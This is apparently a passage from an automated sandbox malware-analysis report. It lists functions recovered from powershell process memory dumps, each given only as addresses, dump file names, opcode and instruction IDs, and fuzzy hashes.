                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b647262f04b2cc3aa8b1ce3f4a15820fef5424985bd4d92ba35e89644d28d735
                                                                                                                                              • Instruction ID: 0a38daa5594457e06644aea25f942895196155e63b6af6d6e5ade9d6b1518b4f
                                                                                                                                              • Opcode Fuzzy Hash: b647262f04b2cc3aa8b1ce3f4a15820fef5424985bd4d92ba35e89644d28d735
                                                                                                                                              • Instruction Fuzzy Hash: 51514974A012148FC799EF79D8446ADBBF2BF88311B158469E906EB790DB31DC41CF90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780B3AA Relevance: .1, Instructions: 133COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7bdbf67d8d92006bd3d507cc2bc5a502d405a21e8773d535cd37d1d3942fbc3c
                                                                                                                                              • Instruction ID: b3fc2cb73cddaf6e090386d6895c982cbbbe63b3602528c46eb17e20bf960d29
                                                                                                                                              • Opcode Fuzzy Hash: 7bdbf67d8d92006bd3d507cc2bc5a502d405a21e8773d535cd37d1d3942fbc3c
                                                                                                                                              • Instruction Fuzzy Hash: 97510AB4A002099FDB54DFA4D8957AEBBB2FF85304F148069E90AEB381DF349D45CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780D5C0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 52e66a95f8b3d46e8fbf084f9123f23ac313c422dc81b55f788b86e157abd4b5
                                                                                                                                              • Instruction ID: 3df4579623edb2023d4158c35a9e95c8d2b87a35dd8991184e3f78935d1426fb
                                                                                                                                              • Opcode Fuzzy Hash: 52e66a95f8b3d46e8fbf084f9123f23ac313c422dc81b55f788b86e157abd4b5
                                                                                                                                              • Instruction Fuzzy Hash: 5231F6B53006105FD7055BB89868A2E7FABEFC4751B08806AE90ADB3A1CF35DD05C7A5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078045C5 Relevance: .1, Instructions: 108COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 18f0e790c3c8853a52ae45ad7e3d8bdd5602d21fc6b155bf48512728409a6148
                                                                                                                                              • Instruction ID: 5fa69deb23e62c27573cf7789dead8bcf6bfe1ebc08e3333ebd7f6fc806cd854
                                                                                                                                              • Opcode Fuzzy Hash: 18f0e790c3c8853a52ae45ad7e3d8bdd5602d21fc6b155bf48512728409a6148
                                                                                                                                              • Instruction Fuzzy Hash: 1931C1B5E002989FDB45CF69D844ADEBBF5FF8A310F0481AAE9559B3A1D7718C01CB80
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078057C5 Relevance: .1, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d44c8784f02dd6f8b42edec5e9cdd2e8377a446ab3fc6bf839482eab540a65ac
                                                                                                                                              • Instruction ID: 3364b918a5a916cd7766534c93254457cb2613ad2dd09b28e30de0c34ff42aa4
                                                                                                                                              • Opcode Fuzzy Hash: d44c8784f02dd6f8b42edec5e9cdd2e8377a446ab3fc6bf839482eab540a65ac
                                                                                                                                              • Instruction Fuzzy Hash: BD4114B8A0020ADFDB649FA1D958BAEBBB2FF54314F148028D416DB290CB35A951CF90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07804C68 Relevance: .1, Instructions: 93COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 966339097e41f86efc43472d30c17005522acdc2c8465cd4df151703c055877e
                                                                                                                                              • Instruction ID: 039079d41f1edd856bce9957cc47826698679008f1701c1bcdbb5cfe9c84ab96
                                                                                                                                              • Opcode Fuzzy Hash: 966339097e41f86efc43472d30c17005522acdc2c8465cd4df151703c055877e
                                                                                                                                              • Instruction Fuzzy Hash: DC31A3B1A002059BDB94EFA5D8586AEB7B6EF89315F048429D906E7390DF35AC04CFE0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075AC600 Relevance: .1, Instructions: 84COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c78f1339446ee610790ff9dee32f6792c2f26523bda341bf3fcbdcedbd82da7f
                                                                                                                                              • Instruction ID: a4e278d7dc885159d3b9eb667b8873359f9460a0950bac960707b6a7fe528302
                                                                                                                                              • Opcode Fuzzy Hash: c78f1339446ee610790ff9dee32f6792c2f26523bda341bf3fcbdcedbd82da7f
                                                                                                                                              • Instruction Fuzzy Hash: A53148757003469FCB24DF29C4849ABB7F6FF89250B14886AE456CB361DB31EC41CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07804650 Relevance: .1, Instructions: 81COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 26dc89fbaf2cb56105d3722cec333efa0487105faaa692736a9f6d1fcf5180e1
                                                                                                                                              • Instruction ID: 2d241c73b093365a6fe3fa725f91a88a5aec92f35b234b0c5bbaa2980202afaa
                                                                                                                                              • Opcode Fuzzy Hash: 26dc89fbaf2cb56105d3722cec333efa0487105faaa692736a9f6d1fcf5180e1
                                                                                                                                              • Instruction Fuzzy Hash: DC216DB5E001589FDB55CFA9D844AEDBBF6FF89310F108069E918AB3A0C7719C41CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780FC60 Relevance: .1, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3d68d513a04d2975822552964796ff8f094da25b51b6b0b4ef90a582e7526d8a
                                                                                                                                              • Instruction ID: 1facf81bcd7da7fb15cbbcc32eba4b133b032ef58778cdea64efbc30bf1657e3
                                                                                                                                              • Opcode Fuzzy Hash: 3d68d513a04d2975822552964796ff8f094da25b51b6b0b4ef90a582e7526d8a
                                                                                                                                              • Instruction Fuzzy Hash: 882147719043458BDB24DF34C8443EABBF2AFD9310F088A2AD541E7290DB7459C5CBD1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07805E40 Relevance: .1, Instructions: 77COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 54665af6791c1f1699348c49113ca63a61969507c1379c693f73c3cb443ea8a6
                                                                                                                                              • Instruction ID: 89c673fe30a5dd4e44815f5b341413474c6e85ad6704b3e448843d2e5d21c318
                                                                                                                                              • Opcode Fuzzy Hash: 54665af6791c1f1699348c49113ca63a61969507c1379c693f73c3cb443ea8a6
                                                                                                                                              • Instruction Fuzzy Hash: 6111E9727042894FCF119AB998106AD7FE98FC1211F1800FBD44DD7281EE298E1597F2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07805F00 Relevance: .1, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 31abf177d683e5f042b8e85bd442e3ace1357aca045982b39a5599dd37b64793
                                                                                                                                              • Instruction ID: 531cb8a16312854d4d120e763a5afdc5605c694ff4448373ea30b933d22117b4
                                                                                                                                              • Opcode Fuzzy Hash: 31abf177d683e5f042b8e85bd442e3ace1357aca045982b39a5599dd37b64793
                                                                                                                                              • Instruction Fuzzy Hash: 8A31F874A00219CFCB58DFA8C5949EDBBF1BF49211F2481A9D406E73A1DB359E41CF91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075AC5F0 Relevance: .1, Instructions: 73COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 65e4e33ac0132b235831e2403dcd50a93513e1714342a6e270c62e8b1d120bee
                                                                                                                                              • Instruction ID: c96f1043efaf393e8d05f40f643cbc5d63a7e61593d20d32c6d446ab604260d7
                                                                                                                                              • Opcode Fuzzy Hash: 65e4e33ac0132b235831e2403dcd50a93513e1714342a6e270c62e8b1d120bee
                                                                                                                                              • Instruction Fuzzy Hash: 92217CB5B013469FC710DF78D8448ABBBBABF89200B14486AE545DB351DB30E805CB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07805F10 Relevance: .1, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 230afbd55107c52bfe21c4365901abe355c7c24c8e8b145f338ecbebe40652dc
                                                                                                                                              • Instruction ID: cca8b5e9af6cd5e7a480750fd8576eb28e75e0cfa0f3671d0c02778393edf634
                                                                                                                                              • Opcode Fuzzy Hash: 230afbd55107c52bfe21c4365901abe355c7c24c8e8b145f338ecbebe40652dc
                                                                                                                                              • Instruction Fuzzy Hash: 4821E674A00219CFCB48EFA8C4849ADBBF2BF48211F248169D406E73A0EB359E41CF91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075A5BD8 Relevance: .1, Instructions: 61COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 46ad88f4162944071357c0bb2669fb5abad6bbc477fa1aaea0f61920c44c9ceb
                                                                                                                                              • Instruction ID: 60944b3f205a9fa90ae5cfee86c37d68b21c17c4fda292179138cfb4f1d82e30
                                                                                                                                              • Opcode Fuzzy Hash: 46ad88f4162944071357c0bb2669fb5abad6bbc477fa1aaea0f61920c44c9ceb
                                                                                                                                              • Instruction Fuzzy Hash: 0D11A5313006199FC718AB3DE45456EBBABFBC4725B05893AE50EC7744DF38A846CBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078084D0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9119cd44b99489b4de0283d4edfe7902cb0f79ce52a503919396d902e1c3db4d
                                                                                                                                              • Instruction ID: c8b816c739451532f6503ac9371e3ebb96ae3e7822604aa4c5c265ba13a03eb1
                                                                                                                                              • Opcode Fuzzy Hash: 9119cd44b99489b4de0283d4edfe7902cb0f79ce52a503919396d902e1c3db4d
                                                                                                                                              • Instruction Fuzzy Hash: C4116AB4A1034A9FCB40DFA8C8148EE7BB1FF89300B10449AE856EB351DB34D941CBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075A70D0 Relevance: .1, Instructions: 54COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 48c8c5f7bba330036c2347acd65d4eaac847ce74db2d7bc1c027215a0f807445
                                                                                                                                              • Instruction ID: 2856a3420de32579ae702c6aa65b539352fb7eb5b7acaa49760beff1179cf198
                                                                                                                                              • Opcode Fuzzy Hash: 48c8c5f7bba330036c2347acd65d4eaac847ce74db2d7bc1c027215a0f807445
                                                                                                                                              • Instruction Fuzzy Hash: 8E115EB0A00219ABDB18CBA4C8547EEBBF6BB4D300F108479D405B7240DB795941CFE5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075AC5DA Relevance: .1, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0b5e5d70f6ee950c39210d2239b8120162bf9abb7a4f593d79615ee0c173a888
                                                                                                                                              • Instruction ID: b34f4137fcdb1b9196c975f99a8694f319a9f0b87bf8abc317221468396f2cee
                                                                                                                                              • Opcode Fuzzy Hash: 0b5e5d70f6ee950c39210d2239b8120162bf9abb7a4f593d79615ee0c173a888
                                                                                                                                              • Instruction Fuzzy Hash: 4A1180757013459FCB04DF28D4808AAB7B6FFC9340B24896AE5428F351CB31ED42CB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780D700 Relevance: .0, Instructions: 48COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e3f408f4722ed2bdf8a3c7c04060b984c9ac1f2e54b148b13ed9982f8495a36e
                                                                                                                                              • Instruction ID: bf8c6e2342c92151c633d61b7a33607ecc715495c5ce32b311ca3154f2490914
                                                                                                                                              • Opcode Fuzzy Hash: e3f408f4722ed2bdf8a3c7c04060b984c9ac1f2e54b148b13ed9982f8495a36e
                                                                                                                                              • Instruction Fuzzy Hash: 0CF028A5208A809FD3030B749C3A6A93F70DF52611F4540C7F841CF2F3D61A9916C7A2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780D5B0 Relevance: .0, Instructions: 48COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a7acb5e55c5199962b5d3cb7385281db8421fbad59f0c52f3b324c76ebecb69d
                                                                                                                                              • Instruction ID: cc289893e914bbc3956c6fce32d1a5f6e95906efb7a14649ea9f4623fe421f2f
                                                                                                                                              • Opcode Fuzzy Hash: a7acb5e55c5199962b5d3cb7385281db8421fbad59f0c52f3b324c76ebecb69d
                                                                                                                                              • Instruction Fuzzy Hash: 3E01F2F67045215FD3158E58D858DA67FA9AF956217094096E059CB2F1CB60DC00C7E0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0085D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.430384313.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_85d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 741c0be2735aa2f22b4638f4c6866f1206f06e03f1ff6d5f3fb85204c9d42b55
                                                                                                                                              • Instruction ID: 187264b378d8e23ee517d5d51c0748695570eac5996b52cd30eb01d6297410d4
                                                                                                                                              • Opcode Fuzzy Hash: 741c0be2735aa2f22b4638f4c6866f1206f06e03f1ff6d5f3fb85204c9d42b55
                                                                                                                                              • Instruction Fuzzy Hash: 1101F7714087849AE7308A25DC84767FFD8FF51769F18C01AFD449B2C2C2799809CAB1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078096D8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 15a5527f79c93cee5c170d86c0d6d23d957e52db50686ad23ecc2c292805d97a
                                                                                                                                              • Instruction ID: 33de0081ce5403883a6fa11666d0c25fb9a8937e52cce9292326e52905c9fb0d
                                                                                                                                              • Opcode Fuzzy Hash: 15a5527f79c93cee5c170d86c0d6d23d957e52db50686ad23ecc2c292805d97a
                                                                                                                                              • Instruction Fuzzy Hash: 68014B75E142598FCB44DF69DD018CEBFF5AF89210B1541A7D108E7322EB305A018BE1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0085D005 Relevance: .0, Instructions: 43COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.430384313.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_85d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b585960621b613514a9fce2787d8743c9e242f748cb3e22e423893ad69cbbdc5
                                                                                                                                              • Instruction ID: 253ebc8518aa91d0970bbd0edf9ccda09356d16631e3bc6363aae4cb5cedf9b6
                                                                                                                                              • Opcode Fuzzy Hash: b585960621b613514a9fce2787d8743c9e242f748cb3e22e423893ad69cbbdc5
                                                                                                                                              • Instruction Fuzzy Hash: A101406140D7C05FD7128B258C94B52BFA4EF53225F18C1DBED888F2D3C2695849C772
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078084CF Relevance: .0, Instructions: 36COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a0d09c027e8c425c47f23d6b635a1675d52d9d2ed72493d31f19172ac4b931a2
                                                                                                                                              • Instruction ID: 9e10fc02527a74505f93615fb10a53531e658a083f6cac4cb69e10a32de23ca9
                                                                                                                                              • Opcode Fuzzy Hash: a0d09c027e8c425c47f23d6b635a1675d52d9d2ed72493d31f19172ac4b931a2
                                                                                                                                              • Instruction Fuzzy Hash: 6101D2B4E0021EDF8B40DFA9D8509EEBBB5FF48310B10842AE915E7350EB309951CFA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075AD7B8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ee026a435d6cfa13cf35c34157a8c0f6022855bad8aabe610899bf561144d046
                                                                                                                                              • Instruction ID: 71d5c69ebebf6bb8d17715f89177d2969a2ede83ccc842874a31e91251566afb
                                                                                                                                              • Opcode Fuzzy Hash: ee026a435d6cfa13cf35c34157a8c0f6022855bad8aabe610899bf561144d046
                                                                                                                                              • Instruction Fuzzy Hash: 7101C475A01119DFDB44DF90E99ABECBBB2FB8C321F249125E50667280CB762D46CF60
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078096F0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9993e8c7a862228ed0dc6e5510448be04ef7b0222b140292e15034d8ac7ec5a4
                                                                                                                                              • Instruction ID: b6aacc76ebe1465181e4014523220d0ff988a91d06926b884a3849e55235d33d
                                                                                                                                              • Opcode Fuzzy Hash: 9993e8c7a862228ed0dc6e5510448be04ef7b0222b140292e15034d8ac7ec5a4
                                                                                                                                              • Instruction Fuzzy Hash: 2DF0DA75E101299F8B44DFAEC8058DEBBF5EF8C610B10816AD509E7320E77099018BE0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07805E32 Relevance: .0, Instructions: 29COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 16db685cac2b1c40cb0862df3355892774c37a15462e683516728bc03519f6f6
                                                                                                                                              • Instruction ID: 4c3b485a901f24a33a3de0769a84aa51042b0bbf3e0be234b12f81e58dea83e2
                                                                                                                                              • Opcode Fuzzy Hash: 16db685cac2b1c40cb0862df3355892774c37a15462e683516728bc03519f6f6
                                                                                                                                              • Instruction Fuzzy Hash: 37E06DB2A062989ECF41DEB48E006EDBFF49F11151F1402E7D984D61E2EA348B589BA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075A6800 Relevance: .0, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5bc6046af708ad1a3953b508c5f8bdef07114cc6beab3fb6be8632ed970b1790
                                                                                                                                              • Instruction ID: 5a13b787564414a137cebdab203864b104cb70fcc0572524d9850be118f3f7b6
